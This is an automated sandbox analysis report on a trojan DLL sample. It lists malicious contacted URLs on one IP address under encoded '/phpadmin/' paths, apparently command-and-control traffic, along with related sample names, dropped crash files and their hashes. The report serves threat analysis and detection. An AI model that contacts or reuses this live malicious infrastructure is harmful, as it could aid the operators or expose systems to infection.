                      http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.srctrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.srctrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.srctrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      146.70.35.138
                      		unknownUnited Kingdom
                      		2018TENET-1ZAtrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:614287
                      Start date and time: 23/04/202208:10:432022-04-23 08:10:43 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 16s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:VoevdOQpeU.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:43
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDLL@29/23@0/2
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HDC Information:
                      • Successful, ratio: 21% (good quality ratio 19.9%)
                      • Quality average: 80.7%
                      • Quality standard deviation: 28.6%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 104
                      • Number of non-executed functions: 215
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6532 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      08:11:55API Interceptor1x Sleep call for process: rundll32.exe modified
                      08:12:10API Interceptor2x Sleep call for process: WerFault.exe modified
                      08:12:34API Interceptor41x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      146.70.35.138nhLAwAo49f.dllGet hashmaliciousBrowse
                        d6YCUW421p.dllGet hashmaliciousBrowse
                          FJHd.dllGet hashmaliciousBrowse
                            NdmYtW.dllGet hashmaliciousBrowse
                              pDut.dllGet hashmaliciousBrowse
                                HxEWwh74qT.dllGet hashmaliciousBrowse
                                  b.exeGet hashmaliciousBrowse
                                    0x0007000000012676-63.exeGet hashmaliciousBrowse

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      TENET-1ZAsora.armGet hashmaliciousBrowse
                                      • 163.200.117.90
                                      nhLAwAo49f.dllGet hashmaliciousBrowse
                                      • 146.70.35.138
                                      d6YCUW421p.dllGet hashmaliciousBrowse
                                      • 146.70.35.138
                                      FJHd.dllGet hashmaliciousBrowse
                                      • 146.70.35.138
                                      NdmYtW.dllGet hashmaliciousBrowse
                                      • 146.70.35.138
                                      pDut.dllGet hashmaliciousBrowse
                                      • 146.70.35.138
                                      HxEWwh74qT.dllGet hashmaliciousBrowse
                                      • 146.70.35.138
                                      o0nBmbV6auGet hashmaliciousBrowse
                                      • 163.200.142.51
                                      84wwQQbbDjGet hashmaliciousBrowse
                                      • 143.128.168.158
                                      o2AHUUgivhGet hashmaliciousBrowse
                                      • 146.239.92.86
                                      b.exeGet hashmaliciousBrowse
                                      • 146.70.35.138
                                      bKhQyaq7WP.exeGet hashmaliciousBrowse
                                      • 146.70.87.230
                                      wZtQzFZJYa.exeGet hashmaliciousBrowse
                                      • 146.70.87.230
                                      H7qgr6X0nvGet hashmaliciousBrowse
                                      • 155.233.139.115
                                      eoT6xLnNfY.exeGet hashmaliciousBrowse
                                      • 146.70.87.230
                                      jew.x86Get hashmaliciousBrowse
                                      • 146.69.137.13
                                      sora.armGet hashmaliciousBrowse
                                      • 155.232.149.247
                                      irq0Get hashmaliciousBrowse
                                      • 146.68.19.240
                                      l0zzxRl556.exeGet hashmaliciousBrowse
                                      • 146.70.87.230
                                      wuxznEjJoIGet hashmaliciousBrowse
                                      • 143.128.168.138

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_164b3f26\Report.wer

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.8484271078729315
                                      Encrypted:false
                                      SSDEEP:96:8xnXzFGeUnYyQy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHg+AS/YyNlISWbSmH:8RzoneH0tGtjLq/u7sZS274ItW
                                      MD5:AC7F4345BC16B046B4BD7A4B49FAD9DE
                                      SHA1:31DB96A77E8C9352345D2D35BDD922C5A989733E
                                      SHA-256:0FE9F258A2E001391DD7FE936ED71F39F02E4A21502048E07AD9AFF57D5D9B8A
                                      SHA-512:F029D90D1FE667A52F3ECD173F11501CA11E15159116660080259EA0F562063CD60BA96DEE65A25CC56E7BBCED3D62E93FDE77354CFF4B959ABF6E7EDDC92DC6
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.6.8.6.4.1.0.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.2.9.5.6.7.2.1.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.2.4.1.b.1.9.-.9.c.1.3.-.4.6.3.b.-.a.9.b.d.-.4.a.9.5.3.6.d.5.a.3.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.2.f.1.2.6.9.-.a.2.3.4.-.4.9.c.1.-.a.a.e.4.-.4.e.4.1.7.5.a.d.7.b.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5f68951fc85ec886a9cff2e6302d69913a8368e_7cac0383_107353c7\Report.wer

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.8450263074663521
                                      Encrypted:false
                                      SSDEEP:96:86XqFfeUnYyGy9haTKzfopXIQcQac6FcElcw3d+a+z+HbHg+AS/YyNlISWbSm9mK:8aqFnoHEBPBjLq/u7sZS274ItW
                                      MD5:E3453784F5987FFC4297D68B3E5806EC
                                      SHA1:8AE5D7F0D9E1EDD426FD57793895BF06C7D55090
                                      SHA-256:A19FAA5C0A3344576E5CA6B3D224AF727B5260220821BFD197D80F502CC5D9FC
                                      SHA-512:FEDF432EFCB2E02D4F617DBEC17EFD457DA47CE6D4AC7040046C4696A1CB7D78E1D2F57F0E7E44C6B2E4ADFDD4B1900F4350B8B0DFCFE51F01448A96D011F5D8
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.3.6.0.5.9.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.5.3.0.9.0.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.6.8.f.e.a.e.-.1.3.e.b.-.4.b.8.7.-.a.8.a.d.-.3.5.e.c.1.a.c.8.a.3.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.4.9.d.4.4.c.-.a.8.3.4.-.4.9.8.a.-.b.a.8.2.-.c.3.d.a.4.5.4.7.f.4.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F57.tmp.dmp

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:08 2022, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):39506
                                      Entropy (8bit):2.072438553320638
                                      Encrypted:false
                                      SSDEEP:192:J54NgWJJkH67dJ+OIKcUcXyK7UbBDaNCQSxtledkyhmWlzwkEFsdw:3LWT7j5IjU4yK7UbBDaMQ6tledkytK
                                      MD5:C917F1742DC83F5A043197F2F54A0C4E
                                      SHA1:AACA0FC29708705FDBB4F63CC4E9962D0EC5E3EF
                                      SHA-256:142F090B56F1D4E7F37963F99E41AAD407C6F3C1F845BC0915A7EFF81C662889
                                      SHA-512:61CE862EBD1E02188B5920FA6A57B7269CC4B69FE874AF24C8EB589484EC9B08B540D6E4550CA540686700FAB1A8BC6065D34B9DD7F7DDFF68E5E1E6D68004A6
                                      Malicious:false
                                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T...............j............................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER36F9.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8340
                                      Entropy (8bit):3.69846117157985
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNiN/6idq06Y43SUHqgmfJSP+prQ89bgW2TsfkAm:RrlsNiF6W6YoSUKgmfJS2gW24fy
                                      MD5:03FE517493CDA2DA9A9CB5CF3B51E3C8
                                      SHA1:6DAA111381E6A2BA15D14F385ECD9EE1E680EE70
                                      SHA-256:088A2319CDDC0633C74897267FED482A3F4602182B6757D5E276C4283FAA5988
                                      SHA-512:2097EA78A64D0674A3B8CA2D51A0229B07993A46B876B48F168F926A802EDD16BE710F9EFEB5CA1B5468D0F5E26299ED049E44074A9923C903CAD0A66D567DBC
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3890.tmp.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4598
                                      Entropy (8bit):4.468439994201981
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhP8fm8M4J2+EZFI+q849hGpKcQIcQw0kd:uITfIoWgrsqY1UJKErGpKkw0kd
                                      MD5:1F581D2D671323001820EEC345955E8D
                                      SHA1:84D57DE07A1A92920A775FD9A2EF441FD6D55EDC
                                      SHA-256:F3C1719825384E2811940641C8F25B5C7C9A8CF7FDFF96C79BD1B7094C66BDC1
                                      SHA-512:E435C1E51CFA9E549F043F8BE4DA0878D52CAA517CC84E732A0800404F08FCC0EE1566E386E3B198C6E254997C8707CD2ED5AF4131285373A55FCFE4191FBF2C
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER49A5.tmp.dmp

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:14 2022, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):36062
                                      Entropy (8bit):1.9519178024623962
                                      Encrypted:false
                                      SSDEEP:192:b5fZJJkHYyfKOIKcmk2QSxksjVaYHbiJjmJmRsK:9h4VIjmk2Q6ksjYUmX
                                      MD5:B26D761700EC27A85A7E8306F7D9C1CD
                                      SHA1:26BA946FC504E3B720545A54C6166E6A2841B1FC
                                      SHA-256:A4A981D31AF326622D356EB84A53F327157F52F7EFB02CADB292060F7810FE72
                                      SHA-512:3205B01478F80D692A1735122340421C8868EF2150ACB96AFFB58777B301034BF223260BF04B93CCDA2F160E29DA10286CD50E4077D174CBEDA5750449E600C3
                                      Malicious:false
                                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T................t...........................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D5F.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8300
                                      Entropy (8bit):3.69036741286865
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNiNx6ihq06Y4YSUfPgmfRSO+pDn89b3dW2Tsf3lFm:RrlsNiL6q6Y3SU3gmfRSitW24fe
                                      MD5:C80DFEB2FD09E96D80A105BF1416186F
                                      SHA1:C2E029A858E8ED96BB46CEB163704C526428BB15
                                      SHA-256:B3CE25563BAB4D09351E626D47559203FC2F9E73F43D27AD95C8222BBF41688F
                                      SHA-512:785520C461DF2D2ABFFD907C65A3656B50232434394EA4CE68D02BBC5569D2D3EB307DA67ADCD9C9CE8FD99F9FC0AA888E4456CF642EA1AC3E72D14B7C470FD5
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4EB8.tmp.xml

                                      Download File
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4564
                                      Entropy (8bit):4.439548228059502
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhx8fm8M4J2+voFI+q84acupKcQIcQw0kd:uITfIoWgrsqY1WJVBO/pKkw0kd
                                      MD5:DF03F167543BFE5B6CDEF17CD6CDB700
                                      SHA1:6BBC61B7DBF6EB32A530D87A971944CDD312120D
                                      SHA-256:84B755FD6CFD16130CE8987B8BBE160B50DAB6E97F05AB376C74909198264B80
                                      SHA-512:504C3F517AFEBFE84B4641320FCCB9107C42081F8A6A8672E073F46341DF6CF43569F29E69B8623EC2F86F32A92262FD58EB57FBA10F4F81EACBD4AD6E3E719E
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):11606
                                      Entropy (8bit):4.8910535897909355
                                      Encrypted:false
                                      SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                      MD5:F84F6C99316F038F964F3A6DB900038F
                                      SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                      SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                      SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                      Malicious:false
                                      Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                      C:\Users\user\AppData\Local\Temp\RES2392.tmp

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                      Category:dropped
